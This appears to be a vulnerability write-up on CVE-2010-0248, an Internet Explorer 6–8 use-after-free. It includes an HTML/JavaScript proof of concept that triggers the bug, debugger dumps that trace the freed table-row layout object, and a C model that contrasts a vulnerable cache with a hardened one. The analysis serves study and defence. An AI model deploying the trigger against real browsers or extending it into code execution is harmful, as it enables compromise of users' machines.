
CVE-2010-0248

[CNNVD] Microsoft Internet Explorer multiple remote code execution vulnerabilities (CNNVD-201001-237)

        Microsoft Internet Explorer 6, 6 SP1, 7 and 8 do not properly handle objects in memory, which may allow a remote attacker to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) has been deleted. The flaw results in memory corruption and is also known as the "Uninitialized Memory Corruption Vulnerability".

POC

<html><body>
<table id="test"> <tr></tr> </table>
<script>
Math.tan(2,3);                       // harmless calls, kept as in the original POC
var test = document.getElementById("test");
Math.sin(0);
var x = test.cells.item(0);          // first access to the cells collection
Math.cos(0);
test.outerText = 'test text';        // deletes the table (and its row layout)
Math.tan(2,3);
x = test.cells.item(0);              // references the table's cells again: this reads freed memory
</script>
</body></html>

Reuse

Register dump and stack at the crash. CTableCellsCollectionCacheItem::GetNext reads [eax+54h], and the memory eax points into is no longer readable (????????):

1:020> r
eax=0644efa0 ebx=00000078 ecx=00000000 edx=00000000 esi=00000078 edi=06e0bfd8
eip=685dbb57 esp=0429ef60 ebp=0429efa8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CTableCellsCollectionCacheItem::GetNext+0x12:
685dbb57 3b4854          cmp     ecx,dword ptr [eax+54h] ds:0023:0644eff4=????????
1:020> kv
ChildEBP RetAddr  Args to Child
0429ef60 68404383 00000000 063ecfd0 00000078 mshtml!CTableCellsCollectionCacheItem::GetNext+0x12 (FPO: [0,0,1])
0429efa8 68404319 063ecfd0 07cbcc18 00000004 mshtml!CCollectionCache::GetIntoAry+0x4e
0429efec 684044a2 00000002 07cbcc18 0429f0d8 mshtml!CCollectionCache::GetDispID+0x13e
0429f000 684190d4 063ecfd0 00000002 07cbcc18 mshtml!DispatchGetDispIDCollection+0x3f
0429f028 683f1e59 06e0dfd8 07cbcc18 10000001 mshtml!CElementCollectionBase::VersionedGetDispID+0x46
0429f06c 68a3a304 06657fd8 07cbcc18 10000001 mshtml!PlainGetDispID+0xdc
0429f09c 68a3a272 07cbcc18 0429f0d8 06657fd8 jscript!IDispatchExGetDispID+0xa5
0429f0b4 68a3a47a 05646d10 0429f0d8 00000001 jscript!GetDex2DispID+0x31
0429f0e0 68a4d8c8 05646d10 0429f114 00000003 jscript!VAR::InvokeByName+0xee
0429f12c 68a4d96f 05646d10 00000003 0429f2ac jscript!VAR::InvokeDispName+0x7d
0429f158 68a451b6 05646d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce
0429f2f4 68a45c9d 0429f30c 0429f450 07ccaf88 jscript!CScriptRuntime::Run+0x2a97
0429f3dc 68a45bfb 0429f450 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0429f424 68a45e11 0429f450 00000000 00000000 jscript!ScrFncObj::Call+0x8d
0429f4a0 68a4612a 07ccaf88 0429f660 00000000 jscript!CSession::Execute+0x15f
0429f4ec 68a4c2d9 0563cdf0 0429f660 0429f670 jscript!COleScript::ExecutePendingScripts+0x1bd
0429f550 68a4c0f1 0563cdf0 071a2fec 68336970 jscript!COleScript::ParseScriptTextCore+0x2a4
0429f578 683368c7 0563cdf4 06e30e14 071a2fec jscript!COleScript::ParseScriptText+0x30
0429f5d0 683366bf 0711cfa8 00000000 07184f30 mshtml!CScriptCollection::ParseScriptText+0x218
0429f694 68336c35 00000000 00000000 00000000 mshtml!CScriptElement::CommitCode+0x3ae

Release

Register dump and stack at the point where the layout is freed. The assignment to outerText (CElement::put_outerText) splices the old subtree out of the tree, the element is passivated, and CLayout::Release runs on the layout object at 06572fa0:

1:021> r
eax=681c95f8 ebx=07762fc0 ecx=06572fa0 edx=057b1980 esi=06572fa0 edi=07762fc0
eip=683e2f5b esp=041aedf0 ebp=041aee0c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CLayout::Release:
683e2f5b 8bff            mov     edi,edi
1:021> kv
ChildEBP RetAddr  Args to Child
041aedec 683e32d0 06572fa0 00000000 07762fc0 mshtml!CLayout::Release
041aee0c 68387da7 0676ef30 00000000 041aef78 mshtml!CElement::Passivate+0xce
041aee1c 683e0fdf 07762fc0 00000000 682c660e mshtml!CBase::PrivateRelease+0x2d
041aee28 682c660e 0676ef30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
041aef78 682c5b42 041af09c 7728517e 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
041af058 682c6ff9 041af090 041af09c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
041af0a8 682c6f39 041af108 041af144 00000001 mshtml!CDoc::CutCopyMove+0xca
041af0c4 682c6f17 041af108 041af144 00000000 mshtml!CDoc::Remove+0x18
041af0dc 681f288a 041af144 07799fb8 07a54c58 mshtml!RemoveWithBreakOnEmpty+0x3a
041af180 682c704a 00000001 00000000 07a54c58 mshtml!CElement::InjectInternal+0x32a
041af19c 6850aee9 07799fb8 00000001 00000000 mshtml!CElement::InjectCompatBSTR+0x46
041af1c0 684072d6 07799fb8 07a54c58 07a72fd0 mshtml!CElement::put_outerText+0x25
041af1f0 683f235c 07799fb8 07a72fd0 0771efd8 mshtml!GS_BSTR+0x1ac
041af264 683fc75a 07799fb8 80010405 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
041af2b4 6826f1e5 07799fb8 80010405 00000001 mshtml!CElement::ContextInvokeEx+0x9d
041af2f8 683a3104 07799fb8 80010405 00000001 mshtml!CTable::VersionedInvokeEx+0xbf
041af34c 6baca22a 04fbefd8 80010405 00000001 mshtml!PlainInvokeEx+0xeb
041af388 6baca175 070fed10 80010405 00000409 jscript!IDispatchExInvokeEx2+0x104
041af3c4 6baca3f6 070fed10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
041af484 6baca4a0 80010405 00000004 00000000 jscript!InvokeDispatchEx+0x98

Allocation

Page-heap record for the same object: a 0x5c-byte CTableRowLayout, allocated from CTableRow::RowLayoutCache while the parser flushed its notifications for the table row:

1:021> !heap -p -a 06572fa0
    address 06572fa0 found in
    _DPH_HEAP_ROOT @ 191000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 65b25e4:          6572fa0               5c -          6572000             2000
          mshtml!CTableRowLayout::`vftable'
    70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77247d96 ntdll!RtlpAllocateHeap+0x000000c4
    772134ca ntdll!RtlAllocateHeap+0x0000023a
    68319b3b mshtml!GetLayoutFromFactory+0x00000697
    683bdf7b mshtml!CElement::CreateLayout+0x00000021
    682bd56d mshtml!CTableRow::RowLayoutCache+0x00000043
    682bcff2 mshtml!CTableRow::Notify+0x00000176
    6830780a mshtml!CHtmRootParseCtx::FlushNotifications+0x000001bf
    68306bb5 mshtml!CHtmRootParseCtx::Commit+0x0000000a
    682f77cf mshtml!CHtmPost::Broadcast+0x0000000f
    682f7924 mshtml!CHtmPost::Exec+0x00000255
    682f8a99 mshtml!CHtmPost::Run+0x00000015
    682f89fd mshtml!PostManExecute+0x000001fb
    682f95b6 mshtml!CPostManager::PostManOnTimer+0x00000134
    683994b2 mshtml!GlobalWndOnMethodCall+0x000000ff
    683837f7 mshtml!GlobalWndProc+0x0000010c
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e
    7721b3f5 ntdll!__RtlUserThreadStart+0x00000070
    7721b3c8 ntdll!_RtlUserThreadStart+0x0000001b

Putting the three dumps together, the POC does the following:

<table id="test"> <tr></tr> </table>

creates the CTableRowLayout object (the 0x5c-byte page-heap allocation above);

test.outerText = 'test text';

releases the CTableRowLayout object (CElement::put_outerText removes the old subtree, and CLayout::Release frees the layout);

x = test.cells.item(0);

dereferences the released CTableRowLayout object through a dangling pointer: the cells collection cache walked by CTableCellsCollectionCacheItem::GetNext still refers to it, and the read at [eax+54h] lands in memory that has already been freed.

Why is the freed object still dereferenced? How did the dangling pointer come about?
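The dumps show the pattern but not the code that produces it. The C model below is added here as an illustration and is not mshtml's code: the struct layouts, field names, the static pool, the version counter and the cache logic are all assumptions of the model. It replays the POC's three steps against a cells cache that keeps a raw pointer to the row layout, so the second item(0) goes through released memory, and then against a cache that records the tree version it was built for and rebuilds itself after any mutation. The version-check is one generic way to kill this class of dangling pointer, not the vendor's fix.

```c
#include <stdio.h>

#define UAF_SENTINEL 0xCCCCCCCCu
#define POOL_SIZE    4

/* Model objects (assumed names/fields, not mshtml's real layouts). */
typedef struct RowLayout {          /* stands in for CTableRowLayout            */
    int      alive;                 /* model-only tracker: 1 allocated, 0 freed */
    unsigned cell_count;            /* stands in for the field read at [eax+54h] */
} RowLayout;
typedef struct TableRow { RowLayout *layout; } TableRow;   /* the <tr>, owns its layout */
typedef struct Table {
    TableRow *row;                  /* NULL once outerText replaced the content */
    unsigned  tree_version;         /* bumped on every tree mutation (hardening) */
} Table;
typedef struct CellsCache {         /* the test.cells collection cache           */
    RowLayout *layout;              /* raw pointer copied from the tree: the dangling pointer */
    unsigned   version;             /* tree_version when the cache was filled    */
    int        populated;
} CellsCache;

/* Layouts live in a static pool so a released object's memory stays mapped and the
 * stale read can be observed without undefined behaviour. Page heap in the real
 * trace does the opposite, which is why the crash reads ???????? at [eax+54h]. */
static RowLayout g_pool[POOL_SIZE];
static int       g_pool_next;
static int       g_uaf_reads;       /* reads that went through a released layout */
static TableRow  g_row;
static Table     g_table;

static RowLayout *layout_create(unsigned cells)
{
    RowLayout *l = &g_pool[g_pool_next++ % POOL_SIZE];
    l->alive = 1;
    l->cell_count = cells;
    return l;
}

static void layout_release(RowLayout *l)          /* CLayout::Release */
{
    l->alive = 0;
    l->cell_count = UAF_SENTINEL;                 /* poison, like a freed heap block */
}

/* Every read goes through here so the model can count stale accesses. */
static int layout_cell_count(const RowLayout *l, unsigned *out)
{
    if (!l->alive) { g_uaf_reads++; return -1; }
    *out = l->cell_count;
    return 0;
}

/* <table id="test"><tr></tr></table>: parsing creates the row and its layout. */
static Table *table_create(void)
{
    g_row.layout = layout_create(0);              /* the POC's <tr> has no cells */
    g_table.row = &g_row;
    g_table.tree_version = 0;
    g_uaf_reads = 0;
    return &g_table;
}

/* test.outerText = 'test text': old subtree spliced out, layout released. */
static void table_set_outer_text(Table *t)
{
    if (t->row) { layout_release(t->row->layout); t->row = NULL; }
    t->tree_version++;
}

/* Vulnerable test.cells.item(i): cache filled once, trusted forever.
 * Returns 1 if cell i exists, 0 if not, -1 if the lookup read released memory. */
static int cells_item_vuln(Table *t, CellsCache *c, unsigned i)
{
    unsigned n;
    if (!c->populated) { c->layout = t->row ? t->row->layout : NULL; c->populated = 1; }
    if (c->layout == NULL) return 0;
    if (layout_cell_count(c->layout, &n) != 0) return -1;   /* the crash site */
    return i < n;
}

/* Hardened: cache is rebuilt from the live tree whenever the tree has changed. */
static int cells_item_fixed(Table *t, CellsCache *c, unsigned i)
{
    unsigned n;
    if (!c->populated || c->version != t->tree_version) {
        c->layout = t->row ? t->row->layout : NULL;
        c->version = t->tree_version;
        c->populated = 1;
    }
    if (c->layout == NULL) return 0;
    if (layout_cell_count(c->layout, &n) != 0) return -1;
    return i < n;
}

/* Replays the POC; returns the result of the second item(0). */
static int run_poc(int hardened)
{
    CellsCache cache = {0};
    Table *t = table_create();
    int (*item)(Table *, CellsCache *, unsigned) = hardened ? cells_item_fixed : cells_item_vuln;
    item(t, &cache, 0);                 /* var x = test.cells.item(0);  fills the cache   */
    table_set_outer_text(t);            /* test.outerText = 'test text'; frees the layout */
    return item(t, &cache, 0);          /* x = test.cells.item(0);      reuse            */
}

int main(void)
{
    int r = run_poc(0);
    printf("vulnerable: item() -> %d, stale reads: %d\n", r, g_uaf_reads);
    r = run_poc(1);
    printf("hardened:   item() -> %d, stale reads: %d\n", r, g_uaf_reads);
    return 0;
}
```

In the vulnerable path the second item(0) returns -1 with one stale read, which is the model's equivalent of the page-heap fault in GetNext; in the hardened path the version mismatch forces a rebuild, the cache sees that the row is gone, and no released object is touched.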
